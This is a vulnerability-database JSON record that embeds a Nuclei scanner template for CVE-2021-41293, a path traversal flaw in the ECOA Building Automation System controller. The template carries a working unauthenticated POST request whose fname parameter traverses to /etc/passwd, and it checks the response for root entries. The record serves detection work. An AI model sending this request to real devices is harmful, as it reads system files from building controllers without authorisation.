{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-41293/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-41293/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-41293/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-41293/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-41293/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-41293"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-41293"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-41293.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2021-41293\n\ninfo:\n  name: ECOA Building Automation System - Arbitrary File Retrieval\n  author: 0x_Akoko\n  severity: high\n  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the ECOA BAS controller including /etc/passwd via path traversal in the fname parameter, potentially exposing sensitive system configuration and credentials.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293\n    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php\n    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-41293\n    cwe-id: CWE-22\n    epss-score: 0.19867\n    epss-percentile: 0.97329\n    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: ecoa\n    product: ecs_router_controller-ecs_firmware\n  tags: cve2021,cve,ecoa,lfi,disclosure,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /viewlog.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n        yr=2021&mh=6&fname=../../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502204e46fd54dd016498faaaedc4c0ef1194ab49fabe6a1261af34492bf1de4d8c67022100b3ed2b026783c70a4538980b35f64c0df4cb12cf0eb6e2d1111e54e47d4322c8:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-41293"
}